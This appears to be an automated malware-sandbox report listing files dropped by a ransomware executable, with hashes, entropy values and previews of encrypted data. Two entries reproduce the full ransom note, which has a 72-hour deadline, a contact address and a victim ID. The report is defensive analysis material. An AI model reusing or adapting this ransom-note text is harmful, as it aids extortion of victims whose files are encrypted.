                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.855979717004366
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:dH1wCyQBC36IqpqsDtpu2EhVVyT4kQ9TgS+0elI5QI0OOnGlf2cah0KOX:PwNQA36IqpqsZ02QVVQ4kQ9Tkhm5EOOO
                                                                                            MD5:C3E4B01597844DBE4372B2EB657CDAC2
                                                                                            SHA1:49B8548D144D7F80C7CAE1F217BA55CDBF0E3BD7
                                                                                            SHA-256:E4CD96C04FB662EA1B0758F7695639FE7D40BE9A65C57C6E48F71600E6B98A7E
                                                                                            SHA-512:D11970123D2E6EB35DC7001B717E55C117BB642404D32A64A17BF1C65E9B255B17D3D17CB1233941ED009398C0D2D47AAFDDC01D3DF04277C6FDC6BDF5D4FAF8
                                                                                            Malicious:false
                                                                                            Preview:W..z%.....q.\...=fa.ra.......4...t.!.!..}......7....3...^9..bl.....#...q..../".t,...X..@.#.f....r.\.S.2..V..C...O.........d...,XF.~xQ...F..c8.Z#...B.8?.hN...5.d!x!./x.3..c.C~...M..n.Xghp0$..o..s.....8.q.Y...W.....oy.....6.r.(.a5..,.f..7..J.....N.f...e'..6...k.....^.nA.XA.......btT...L(...'...=.^..>...u..F...u.z.oskL.~..a....V0...%.%..2...G....@e.&L....i=......X..^i.."..Cp..H.M@_.J..o....B.........a.....s....+#af....!.eE!......al...u.S.....J..>..b:....{.Q.7K.>..gs.JV.C.t...:...P(.........0...t3E..m......_....e..Y....\.%fK.......a..d...&O.[P.c...Sb+..{...t#.E..6.....H.,.nas......e.O1....\.Q...d..V.V.vv....|j....y]t.._x/.m.r.@..H..Y.^........SI..y..._@J...pe.?z..W.....;...D..4...........y"....#.{......j).Xh..Z./....c....bt.%U-...j../.f.A#S..3s..f<..4....x..e0 .U....g;....<..}..+F...uC...).&SC.d............B.......=.p.N........f3..K.s...G...8.\.T...9a.9 .y.v<.....AD....f.......<....U.,.<......qT.D....Pn......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.855979717004366
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:dH1wCyQBC36IqpqsDtpu2EhVVyT4kQ9TgS+0elI5QI0OOnGlf2cah0KOX:PwNQA36IqpqsZ02QVVQ4kQ9Tkhm5EOOO
                                                                                            MD5:C3E4B01597844DBE4372B2EB657CDAC2
                                                                                            SHA1:49B8548D144D7F80C7CAE1F217BA55CDBF0E3BD7
                                                                                            SHA-256:E4CD96C04FB662EA1B0758F7695639FE7D40BE9A65C57C6E48F71600E6B98A7E
                                                                                            SHA-512:D11970123D2E6EB35DC7001B717E55C117BB642404D32A64A17BF1C65E9B255B17D3D17CB1233941ED009398C0D2D47AAFDDC01D3DF04277C6FDC6BDF5D4FAF8
                                                                                            Malicious:false
                                                                                            Preview:W..z%.....q.\...=fa.ra.......4...t.!.!..}......7....3...^9..bl.....#...q..../".t,...X..@.#.f....r.\.S.2..V..C...O.........d...,XF.~xQ...F..c8.Z#...B.8?.hN...5.d!x!./x.3..c.C~...M..n.Xghp0$..o..s.....8.q.Y...W.....oy.....6.r.(.a5..,.f..7..J.....N.f...e'..6...k.....^.nA.XA.......btT...L(...'...=.^..>...u..F...u.z.oskL.~..a....V0...%.%..2...G....@e.&L....i=......X..^i.."..Cp..H.M@_.J..o....B.........a.....s....+#af....!.eE!......al...u.S.....J..>..b:....{.Q.7K.>..gs.JV.C.t...:...P(.........0...t3E..m......_....e..Y....\.%fK.......a..d...&O.[P.c...Sb+..{...t#.E..6.....H.,.nas......e.O1....\.Q...d..V.V.vv....|j....y]t.._x/.m.r.@..H..Y.^........SI..y..._@J...pe.?z..W.....;...D..4...........y"....#.{......j).Xh..Z./....c....bt.%U-...j../.f.A#S..3s..f<..4....x..e0 .U....g;....<..}..+F...uC...).&SC.d............B.......=.p.N........f3..K.s...G...8.\.T...9a.9 .y.v<.....AD....f.......<....U.,.<......qT.D....Pn......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.855939602316208
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Swz9nLHH/7xX5wUYTHRBe5KCO0mpzEP2TJsOWiJAwH7agK85NtAwR:SwzJyRmuzEYJoiJ+3o
                                                                                            MD5:619CB5D80F161BA0891617B41BFAEF9C
                                                                                            SHA1:93E4F4CF100D9841F4D674491898A1735F42C20A
                                                                                            SHA-256:F5406F32CBA2384462A4A90793683F5565295A6334A4C9E6BA56C56C9A8AB5A9
                                                                                            SHA-512:FBE02158B2D11F659DDF314565ADCE1D2AE09A7253B14EF0106D3D07C7C1017A0523CE7CD3A98A6571E1DB44FFC67A438FCB048567BEEE8E16E003930DF78095
                                                                                            Malicious:false
                                                                                            Preview:.z.B...>n...K.N..#p.=g...&{.lj......-....az4...L.._.`O[k..P..[>.6..;......)...T....V.....cP../.\b.Cb..Z..Oh.[. K..L..5.{..F.x.jv8...V=..y.].{h.-D..n....o[...u.q..')0.=..N.'..[.i.....fH6.B..2....$.....;..f#.....N.?.7U..h...?...l1..n....B(.!D.T8...p.).........#..;../.g..5.V.Ck*..."Z.A.n..Q0..6qm.b@:....CG3.2.tB..b.T..7j..d=d.p|\}...<.liH.S5%..7..C~...R.&..xOyC.S..d.\.}.....-...........2.=..O..|...)8Z../......~...n.O|..#tGZ!p..(.*...i..&:3.'.......t.....|..H..s?C..}h,"...X..5.G$~.x.t.<.`.....No.<g7..9...:D|...`..GP..iA...~[....\k/5....Bj.o....J..JJ;.f;.[....E..g]..qa.. ..v...|.%b.#.a.yH..K.U_( ..X!..R..of.A.U[.(.\...<C..3|.2......E..../A..&AN..B.&....v(k.3..5._.. ...Y..L......2....I.Qk...Vm..!.]U-.[X....;.....I..u,..s.O..,R..w<.}l/z..#...=.qE#P...uR.*..$..z....'.b.n.N2.Vg.._ut.w.N.u...1\.".Q..2..:.].c.....*..sQ2...h).l.-.........F.#.Vd...2.Sd...(.G5....6Y%\.S`..{.....Y.M-..}.}/L.\q...qy..v.~..=...N-.LSb....v..r...n..gDVK.6?JyK:.D..>...}..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.855939602316208
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Swz9nLHH/7xX5wUYTHRBe5KCO0mpzEP2TJsOWiJAwH7agK85NtAwR:SwzJyRmuzEYJoiJ+3o
                                                                                            MD5:619CB5D80F161BA0891617B41BFAEF9C
                                                                                            SHA1:93E4F4CF100D9841F4D674491898A1735F42C20A
                                                                                            SHA-256:F5406F32CBA2384462A4A90793683F5565295A6334A4C9E6BA56C56C9A8AB5A9
                                                                                            SHA-512:FBE02158B2D11F659DDF314565ADCE1D2AE09A7253B14EF0106D3D07C7C1017A0523CE7CD3A98A6571E1DB44FFC67A438FCB048567BEEE8E16E003930DF78095
                                                                                            Malicious:false
                                                                                            Preview:.z.B...>n...K.N..#p.=g...&{.lj......-....az4...L.._.`O[k..P..[>.6..;......)...T....V.....cP../.\b.Cb..Z..Oh.[. K..L..5.{..F.x.jv8...V=..y.].{h.-D..n....o[...u.q..')0.=..N.'..[.i.....fH6.B..2....$.....;..f#.....N.?.7U..h...?...l1..n....B(.!D.T8...p.).........#..;../.g..5.V.Ck*..."Z.A.n..Q0..6qm.b@:....CG3.2.tB..b.T..7j..d=d.p|\}...<.liH.S5%..7..C~...R.&..xOyC.S..d.\.}.....-...........2.=..O..|...)8Z../......~...n.O|..#tGZ!p..(.*...i..&:3.'.......t.....|..H..s?C..}h,"...X..5.G$~.x.t.<.`.....No.<g7..9...:D|...`..GP..iA...~[....\k/5....Bj.o....J..JJ;.f;.[....E..g]..qa.. ..v...|.%b.#.a.yH..K.U_( ..X!..R..of.A.U[.(.\...<C..3|.2......E..../A..&AN..B.&....v(k.3..5._.. ...Y..L......2....I.Qk...Vm..!.]U-.[X....;.....I..u,..s.O..,R..w<.}l/z..#...=.qE#P...uR.*..$..z....'.b.n.N2.Vg.._ut.w.N.u...1\.".Q..2..:.].c.....*..sQ2...h).l.-.........F.#.Vd...2.Sd...(.G5....6Y%\.S`..{.....Y.M-..}.}/L.\q...qy..v.~..=...N-.LSb....v..r...n..gDVK.6?JyK:.D..>...}..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.865536881315531
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:gg8tkARFkSQMXyCoZGVCu+4iv9F3v1vcn29SCMf3T7N0ViX+pMwZ1iWd:gg7IqMXjoUIu+51vr9SND7uVe+ywDiWd
                                                                                            MD5:AE258EC3548C2103C79105F436190A5F
                                                                                            SHA1:58999D0BCE251A75EB85546A95FA36DAC262BDE4
                                                                                            SHA-256:25D3EF25CBE352015C43EDBCB14854BAFB7F058808123A76459B812F4C5F640A
                                                                                            SHA-512:673D7DD3F200B4D4C6B5E75C23E0A28D9F873068934BB626E44821D88301E25EF065EC31709D5CB7C399C74C1637B338E6C97026B474E50FE81379885951F789
                                                                                            Malicious:false
                                                                                            Preview:=.y..l.c...4]H{.gSLU.0..>L.tx&X+.......9...&....}i...@C.W...5.^/....E......n......x."..3.zQ.+..5...WlJ.:@....0.<...._Y..Yk.,.EJCo%......?a.|x..-..+.@r.^.S..r.-D.n..<.j.........w.S.-.,.....;....h.;..bl...X.C.4.N])>A.8.."2(...I../I..q.....I..>R.4..f".0@.B..-....?....m.$.x.%7.<.C.(..l^....cu...QY.S..=.pwRZ).b.h.......< 9N..m.a.Oq...Z.sd.D.`mW..!...C.hrfl.#.D+....(_.y..W.I...j.v.D.0.*4..bf4W....|ZG.......~D......P.-^..,>.E.P-...T.s..d.....]....cV..T\S.j.A./ik_.Q.....8Zc.?u.h.DRTp..E2.m.j.....g...jp_.........Gy...)".i....\........~(Z.B..l...(}EVG...w...j.L.5...w.g..-.....>..Q.q.... V...<.....[.|v.|_:....J.Uk.u....[<......x/.....y...Ut^..-T.u.CJ.K.~..D..]...G.6M..h.$....:.S....B...9.F*V.UKWm.$...z...zS...0.m..zDO'....b0..C....Y.GYkF[.H.p^X.?,.Eb.H.....T.~.....^^i......>...nI.....=..{AJ`...(.U.u&...Q..i..g$._....).S.P.g..b.T-o`.$.5-I..k.uC_]..8...D....;.J......;Z{....I.A...+..f..}n...T%w!z....@.6X..+...Q......'...HJ.....#`.]..F<.c..k..;.!.....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.865536881315531
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:gg8tkARFkSQMXyCoZGVCu+4iv9F3v1vcn29SCMf3T7N0ViX+pMwZ1iWd:gg7IqMXjoUIu+51vr9SND7uVe+ywDiWd
                                                                                            MD5:AE258EC3548C2103C79105F436190A5F
                                                                                            SHA1:58999D0BCE251A75EB85546A95FA36DAC262BDE4
                                                                                            SHA-256:25D3EF25CBE352015C43EDBCB14854BAFB7F058808123A76459B812F4C5F640A
                                                                                            SHA-512:673D7DD3F200B4D4C6B5E75C23E0A28D9F873068934BB626E44821D88301E25EF065EC31709D5CB7C399C74C1637B338E6C97026B474E50FE81379885951F789
                                                                                            Malicious:false
                                                                                            Preview:=.y..l.c...4]H{.gSLU.0..>L.tx&X+.......9...&....}i...@C.W...5.^/....E......n......x."..3.zQ.+..5...WlJ.:@....0.<...._Y..Yk.,.EJCo%......?a.|x..-..+.@r.^.S..r.-D.n..<.j.........w.S.-.,.....;....h.;..bl...X.C.4.N])>A.8.."2(...I../I..q.....I..>R.4..f".0@.B..-....?....m.$.x.%7.<.C.(..l^....cu...QY.S..=.pwRZ).b.h.......< 9N..m.a.Oq...Z.sd.D.`mW..!...C.hrfl.#.D+....(_.y..W.I...j.v.D.0.*4..bf4W....|ZG.......~D......P.-^..,>.E.P-...T.s..d.....]....cV..T\S.j.A./ik_.Q.....8Zc.?u.h.DRTp..E2.m.j.....g...jp_.........Gy...)".i....\........~(Z.B..l...(}EVG...w...j.L.5...w.g..-.....>..Q.q.... V...<.....[.|v.|_:....J.Uk.u....[<......x/.....y...Ut^..-T.u.CJ.K.~..D..]...G.6M..h.$....:.S....B...9.F*V.UKWm.$...z...zS...0.m..zDO'....b0..C....Y.GYkF[.H.p^X.?,.Eb.H.....T.~.....^^i......>...nI.....=..{AJ`...(.U.u&...Q..i..g$._....).S.P.g..b.T-o`.$.5-I..k.uC_]..8...D....;.J......;Z{....I.A...+..f..}n...T%w!z....@.6X..+...Q......'...HJ.....#`.]..F<.c..k..;.!.....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8549678552085815
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:RWoSi96AWrrnt461ABf1hu6LGHZOudMO3eigQ/IYpa/:sVicAWrrtrABf1hRq5bqaH/IYpa/
                                                                                            MD5:095BBC1341E0E198D040FC975793622D
                                                                                            SHA1:0884805D210A714D438D7C8F00DD6FE4E61C76E2
                                                                                            SHA-256:9AC9B6D762C9F7648C0F9270F2E5A82736B4202A87DA91D7A0DF60E8F3A4241E
                                                                                            SHA-512:DAF2ED6CB793B561D409C796B942F9AF969037460214060902411E2BBABADE15224DD21F5776352F557936367AB597A74B35294E4CD1606F777878A35F345A47
                                                                                            Malicious:false
                                                                                            Preview:..O;c.jdjF.B.{...l...*...\.....%O..*}@..O..z....rF..+.P....g.l.....x....&../?.."...!..N@N.../...jP.J.\.Q...$....}W.....`.3..x.#@....K.....U.C.=....i..2+...l..B....s..V~.Q&)...RZB} >%hX.7+y......#.VI0...N...'.a.<...(.\...T.....0n..9gO..y.z..G.xG.Y..^.c.t.1.y.........u.d.M#pQ..C.X..P...{...(.E..B...mW.N.m..$ ._L..-.}C.3k..7..Z..6....J....T6!o...!K=.y4..A.,P...u.O&..\..{.uU.vV[6....(.....`..].....i.1T.;.h.7...1..E.l\pI.?....A.32G;.W..A'[Y`.et.g....[d-V....!.S..9........x.J.!..X[.pjL..1<b*..I.x.v-.{......'O........jw.lRe..u.N2. .X^...i.>._.1...D.'...........d.S...M#....D..|6Rw...#..e..AH.dm.^U..^aKu.jK.Be ....-2a..).3.T.06.q..@.$.....x..Q..m.64(.>........^.?......E..?m.7.5kx..^JX......g]x..M!.ht..).....04<.....^.....^.}Y...C.Mm;.?.$E.o}.D;FK..q...Fv=.N>.N..J].^.o.;.d....v....."".`.J...]S...F..v.V....@...p...{{......W.B.R..H.....}..c.M..WL47..%.....g..h...`.0.\./.<LPz.[..Z.)...oC...-^..z..d\..`Dr.U.;.....$+[#.3....^..{;?...t.? ...l^.T......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8549678552085815
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:RWoSi96AWrrnt461ABf1hu6LGHZOudMO3eigQ/IYpa/:sVicAWrrtrABf1hRq5bqaH/IYpa/
                                                                                            MD5:095BBC1341E0E198D040FC975793622D
                                                                                            SHA1:0884805D210A714D438D7C8F00DD6FE4E61C76E2
                                                                                            SHA-256:9AC9B6D762C9F7648C0F9270F2E5A82736B4202A87DA91D7A0DF60E8F3A4241E
                                                                                            SHA-512:DAF2ED6CB793B561D409C796B942F9AF969037460214060902411E2BBABADE15224DD21F5776352F557936367AB597A74B35294E4CD1606F777878A35F345A47
                                                                                            Malicious:false
                                                                                            Preview:..O;c.jdjF.B.{...l...*...\.....%O..*}@..O..z....rF..+.P....g.l.....x....&../?.."...!..N@N.../...jP.J.\.Q...$....}W.....`.3..x.#@....K.....U.C.=....i..2+...l..B....s..V~.Q&)...RZB} >%hX.7+y......#.VI0...N...'.a.<...(.\...T.....0n..9gO..y.z..G.xG.Y..^.c.t.1.y.........u.d.M#pQ..C.X..P...{...(.E..B...mW.N.m..$ ._L..-.}C.3k..7..Z..6....J....T6!o...!K=.y4..A.,P...u.O&..\..{.uU.vV[6....(.....`..].....i.1T.;.h.7...1..E.l\pI.?....A.32G;.W..A'[Y`.et.g....[d-V....!.S..9........x.J.!..X[.pjL..1<b*..I.x.v-.{......'O........jw.lRe..u.N2. .X^...i.>._.1...D.'...........d.S...M#....D..|6Rw...#..e..AH.dm.^U..^aKu.jK.Be ....-2a..).3.T.06.q..@.$.....x..Q..m.64(.>........^.?......E..?m.7.5kx..^JX......g]x..M!.ht..).....04<.....^.....^.}Y...C.Mm;.?.$E.o}.D;FK..q...Fv=.N>.N..J].^.o.;.d....v....."".`.J...]S...F..v.V....@...p...{{......W.B.R..H.....}..c.M..WL47..%.....g..h...`.0.\./.<LPz.[..Z.)...oC...-^..z..d\..`Dr.U.;.....$+[#.3....^..{;?...t.? ...l^.T......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.830533497618893
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:8LLi4nlRaiwDYiq6/gvbX3m/mKhKljOiO7vkj6t1/CQ6tdzDKH1TtQRH4X:UfzDKFq1THm/etOi6tNC1txDIW6
                                                                                            MD5:83B8BF617F49833E908E58FEC84CFAA2
                                                                                            SHA1:698D1796355DBF026DC9BB0A77B0656149E991B7
                                                                                            SHA-256:8FDD669264385A897D209BB4A787D20EB3045BFDA563D62B2BCBE2E7D2A34C19
                                                                                            SHA-512:4D5A72FD7A4A3170CE924FFBCAFF2F63CADDE6635E098B3E0D49B3ED0379462E1EB0B5A0DDBF2F578F1132AD51A2F70AEE8FD5F8BCC8F6EC9296BA3A26A06DD1
                                                                                            Malicious:false
                                                                                            Preview:^`+)j<7....v`3......X...2...\.*L_...q.q.;0.../..nF.f..w..$[z..@o.M\.........I..sS...E....`R/C.....o.&.iOa..'.[. ]x.5....x.......SIPn.4..~7..r..L...D6~..3....[O,../2.~kt...[I.e.....o..?..1?....!....d.F.l.....x.A^...l.....S.$W......~.gd..8.hp1..1...;.............+M...A...pM.wP.F...<*I3.,t....0YN9.yK.........Xr.!".....$.jQ..4........u.xZwi.m.].+..Y..4|j.n,......./...~y...RX. ..dO..R.bD....q-K....Y.W.B..c..>.....O.......Z|.]....3S....n.C...Egj..M/+...Q..0np=.....{.(.X........I....r..<.......W.W..xq05...:]k...A....U@..)..0......rxv.^8.B........../.].5....Z.z(.,..h.......}.[....r.(.|.+C..N....+d....`...TKwI...q1....sc.f_.F.K>..x\...%KT.T._.a.d_8?2...;......-../Q/J5...jP.Y...w......k...R..*.|Pi#../.n.m.G*...m6...S..4...c.X..CP.i..U..na.S2....Q....._o0..-B....wc.f..C.......C...u.8C....J.-?,.G..6'rv.#..=..D.......Uo...V..w..._W.........'...L..t].....LOL..S.........+..P;..s...q6....#.m.{wN....io.../\f<./5B6...].....%...V.5..v..,(......*...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.830533497618893
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:8LLi4nlRaiwDYiq6/gvbX3m/mKhKljOiO7vkj6t1/CQ6tdzDKH1TtQRH4X:UfzDKFq1THm/etOi6tNC1txDIW6
                                                                                            MD5:83B8BF617F49833E908E58FEC84CFAA2
                                                                                            SHA1:698D1796355DBF026DC9BB0A77B0656149E991B7
                                                                                            SHA-256:8FDD669264385A897D209BB4A787D20EB3045BFDA563D62B2BCBE2E7D2A34C19
                                                                                            SHA-512:4D5A72FD7A4A3170CE924FFBCAFF2F63CADDE6635E098B3E0D49B3ED0379462E1EB0B5A0DDBF2F578F1132AD51A2F70AEE8FD5F8BCC8F6EC9296BA3A26A06DD1
                                                                                            Malicious:false
                                                                                            Preview:^`+)j<7....v`3......X...2...\.*L_...q.q.;0.../..nF.f..w..$[z..@o.M\.........I..sS...E....`R/C.....o.&.iOa..'.[. ]x.5....x.......SIPn.4..~7..r..L...D6~..3....[O,../2.~kt...[I.e.....o..?..1?....!....d.F.l.....x.A^...l.....S.$W......~.gd..8.hp1..1...;.............+M...A...pM.wP.F...<*I3.,t....0YN9.yK.........Xr.!".....$.jQ..4........u.xZwi.m.].+..Y..4|j.n,......./...~y...RX. ..dO..R.bD....q-K....Y.W.B..c..>.....O.......Z|.]....3S....n.C...Egj..M/+...Q..0np=.....{.(.X........I....r..<.......W.W..xq05...:]k...A....U@..)..0......rxv.^8.B........../.].5....Z.z(.,..h.......}.[....r.(.|.+C..N....+d....`...TKwI...q1....sc.f_.F.K>..x\...%KT.T._.a.d_8?2...;......-../Q/J5...jP.Y...w......k...R..*.|Pi#../.n.m.G*...m6...S..4...c.X..CP.i..U..na.S2....Q....._o0..-B....wc.f..C.......C...u.8C....J.-?,.G..6'rv.#..=..D.......Uo...V..w..._W.........'...L..t].....LOL..S.........+..P;..s...q6....#.m.{wN....io.../\f<./5B6...].....%...V.5..v..,(......*...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8470078897258375
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:gatwRSxtlXsCvRXoMHPtlMlNqe6tjRzdZbUZsPqMm147aoZs/yVyKXiE3:I81sqRX5gq3JDZbmDL4Oss/yJB3
                                                                                            MD5:7651DADB621B34A324FA4D2573964BB4
                                                                                            SHA1:8D9A35BD1282208DA4478267D2031688CE8FA716
                                                                                            SHA-256:7CC5FD059057FFCAA7D6C3A125AC0ECFCAE947F82326393BBA680EBF6C6F3BCC
                                                                                            SHA-512:6CA258794041477897D78FA51418CA059FB521FA561151D601637DA54E927CB699E427E342A28B200B9EFEB112B76CDFBC4C3667CDFA4A03C4D1B64714D9D334
                                                                                            Malicious:false
                                                                                            Preview:.m..........G................@.`....{...j1.....s.r.iZdd.%.0|.B.$...%..f..(......L..P..r..oy..1L...C........v...R..I?rZ..o..*..H`../3.HV2G.Q,:.?W}..@q..Q._:....u.....>.Y.p.=..b?.o.3A...A...n:Y...=F..r....8....z.+C.5.PgO..5..sX.B~.[T>I..U[.S.....h=..t=...%......w.......9.....{.....2.(l.X.E........kC.f.NlmR.w..23l.I..Q.l.5.x.FC.._K...._Af.'jB..q.gJ.....i..;.3.;c.B...6K...."m..5...0B....."..F._...Q8.VI,...<.^...L?m..J1.B%~.=>.7.=..&P....Cd~.._.vL.L.jG......$3..J|.EE......."..Z..F.Ac...X.......T.....h.I..Q?....u.t~G.rB21.L8.P`0*.A...!.Q..)2x{3D\A..."_.\C..o.L..f#.s...j.&....;.....K.f...f....Y....^`i....E.+..........p?.U...l4..[..I.s..l.8&..P;X.Z.)f#".X)./.;..o...o4..g..."../).zHfz.^..=.5..Xw0m..Q.f$.P..-q..,./R........&...g...HwA..fpauS3.....t....?.....hbB\?..D..<..-....7..D........7&.....y.-..\.s.......n...(.._2.....Uuc_....Z..Dv......]....1..mV.P.vY.z.....B8.z.b.Q.*..4...i$...z...>.P.....ruO....cv.v!.E ...cY.j.W\.."...`....*...C.._N4.._E.qe...Y...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8470078897258375
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:gatwRSxtlXsCvRXoMHPtlMlNqe6tjRzdZbUZsPqMm147aoZs/yVyKXiE3:I81sqRX5gq3JDZbmDL4Oss/yJB3
                                                                                            MD5:7651DADB621B34A324FA4D2573964BB4
                                                                                            SHA1:8D9A35BD1282208DA4478267D2031688CE8FA716
                                                                                            SHA-256:7CC5FD059057FFCAA7D6C3A125AC0ECFCAE947F82326393BBA680EBF6C6F3BCC
                                                                                            SHA-512:6CA258794041477897D78FA51418CA059FB521FA561151D601637DA54E927CB699E427E342A28B200B9EFEB112B76CDFBC4C3667CDFA4A03C4D1B64714D9D334
                                                                                            Malicious:false
                                                                                            Preview:.m..........G................@.`....{...j1.....s.r.iZdd.%.0|.B.$...%..f..(......L..P..r..oy..1L...C........v...R..I?rZ..o..*..H`../3.HV2G.Q,:.?W}..@q..Q._:....u.....>.Y.p.=..b?.o.3A...A...n:Y...=F..r....8....z.+C.5.PgO..5..sX.B~.[T>I..U[.S.....h=..t=...%......w.......9.....{.....2.(l.X.E........kC.f.NlmR.w..23l.I..Q.l.5.x.FC.._K...._Af.'jB..q.gJ.....i..;.3.;c.B...6K...."m..5...0B....."..F._...Q8.VI,...<.^...L?m..J1.B%~.=>.7.=..&P....Cd~.._.vL.L.jG......$3..J|.EE......."..Z..F.Ac...X.......T.....h.I..Q?....u.t~G.rB21.L8.P`0*.A...!.Q..)2x{3D\A..."_.\C..o.L..f#.s...j.&....;.....K.f...f....Y....^`i....E.+..........p?.U...l4..[..I.s..l.8&..P;X.Z.)f#".X)./.;..o...o4..g..."../).zHfz.^..=.5..Xw0m..Q.f$.P..-q..,./R........&...g...HwA..fpauS3.....t....?.....hbB\?..D..<..-....7..D........7&.....y.-..\.s.......n...(.._2.....Uuc_....Z..Dv......]....1..mV.P.vY.z.....B8.z.b.Q.*..4...i$...z...>.P.....ruO....cv.v!.E ...cY.j.W\.."...`....*...C.._N4.._E.qe...Y...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.846090092098478
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:F2aPHHMj3VxV34EAUldlP0Qa0rFR8I408uEawfrOhTYb7Xw0ZoX31Y4Src7:FvnMRxFXldlM2FR8xuENS331co
                                                                                            MD5:D9A21D74C8F9AB4A4DF3056059772482
                                                                                            SHA1:742D151E61E3E2DFBC6734C568FC037ED327E0A5
                                                                                            SHA-256:5487C7958B8B741E9224978BCCDD390C4EA07F30997B2A11D0B3602D6D61510C
                                                                                            SHA-512:274CE1CB62B7C134E6C6CA4FDDB06140F82E306D3D2879F503979885AE2EC9CA1EE975C0BFCFA08CFC5633AD15F686F137B4FADEF6168BD27154EFC9EFC332DB
                                                                                            Malicious:false
